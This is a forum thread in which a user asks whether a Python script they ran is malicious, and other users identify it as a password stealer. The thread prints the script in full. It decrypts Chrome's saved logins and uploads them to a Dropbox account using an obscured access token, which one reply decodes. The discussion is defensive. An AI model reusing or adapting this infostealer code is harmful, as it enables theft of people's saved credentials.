Help! I accidentally ran a file without checking the code - Printable Version +- Python Forum (https://python-forum.io) +-- Forum: Python Coding (https://python-forum.io/forum-7.html) +--- Forum: General Coding Help (https://python-forum.io/forum-8.html) +--- Thread: Help! I accidentally ran a file without checking the code (/thread-30988.html) |
Help! I accidentally ran a file without checking the code - scaryzane - Nov-16-2020 So I accidentally ran this file today, and didnt check the python code. Can anybody tell me if this code is malicious? import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil import dropbox from codecs import encode import getpass def upload_passfile(): access_token = encode("pYTjP6sifCxNNNNNNNNNNDIRXrA2kfdgl93KiKK1ddIgXDbvfwWFMmDlTyB1EP0i", 'rot13') file_from = "rc.txt" file_to = "/passwords/" + str(getpass.getuser()) + "'s_passwords.txt" client = dropbox.Dropbox(access_token) client.files_upload(open(file_from, "rb").read(), file_to, dropbox.files.WriteMode.overwrite, mute=True) def get_master_key(): with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f: local_state = f.read() local_state = json.loads(local_state) master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) master_key = master_key[5:] # removing DPAPI master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption return master_key def decrypt_payload(cipher, payload): return cipher.decrypt(payload) def generate_cipher(aes_key, iv): return AES.new(aes_key, AES.MODE_GCM, iv) def decrypt_password(buff, master_key): try: iv = buff[3:15] payload = buff[15:] cipher = generate_cipher(master_key, iv) decrypted_pass = decrypt_payload(cipher, payload) decrypted_pass = decrypted_pass[:-16].decode() # remove suffix bytes return decrypted_pass except Exception as e: decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple return str(decrypted_pass[1]) if __name__ == '__main__': master_key = get_master_key() login_db = os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\default\Login Data' shutil.copy2(login_db, "Loginvault.db") #making a temp copy since Login Data DB is locked while Chrome is running conn = sqlite3.connect("Loginvault.db") cursor = conn.cursor() try: cursor.execute("SELECT action_url, username_value, password_value FROM logins") passfile = open("rc.txt", "w") for r in cursor.fetchall(): url = r[0] username = r[1] encrypted_password = r[2] decrypted_password = decrypt_password(encrypted_password, master_key) passfile.write("URL: " + url + "\nUsername: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 50 + "\n") passfile.close() conn.close() except Exception as e: print(e) upload_passfile() os.remove("rc.txt") os.remove("Loginvault.db") RE: Help! I accidentally ran a file without checking the code - jefsummers - Nov-16-2020 Without deep analysis, this looks like it is trying to obtain your passwords. I would worry, and change all my critical passwords NOW. RE: Help! I accidentally ran a file without checking the code - iiAsez - Dec-25-2020 I had this issue too but after some code analyses I found out that it only retrieves some of your passwords, so I suggest that you change your most important ones, or all of them (recommended). RE: Help! I accidentally ran a file without checking the code - DeaD_EyE - Dec-25-2020 Hm, the hacker should have used Pathlib and his hack works only on Windows.
One thing is strange. From where comes the module Dropbox? This hack can only work, if the dropbox dependency is installed in your current Python Interpreter. PS: His Dropbox Access Token: cLGwC6fvsPkAAAAAAAAAAQVEKeN2xsqty93XvXX1qqVtKQoisjJSZzQyGlO1RC0v RE: Help! I accidentally ran a file without checking the code - buran - Dec-25-2020 (Dec-25-2020, 02:10 PM)DeaD_EyE Wrote: PS:Probably you can report them. It most likely violates Dropbox ToS. RE: Help! I accidentally ran a file without checking the code - DeaD_EyE - Dec-30-2020 They are investigating now but the team is not allowed to visit external urls. So, I provided them also with source code today. |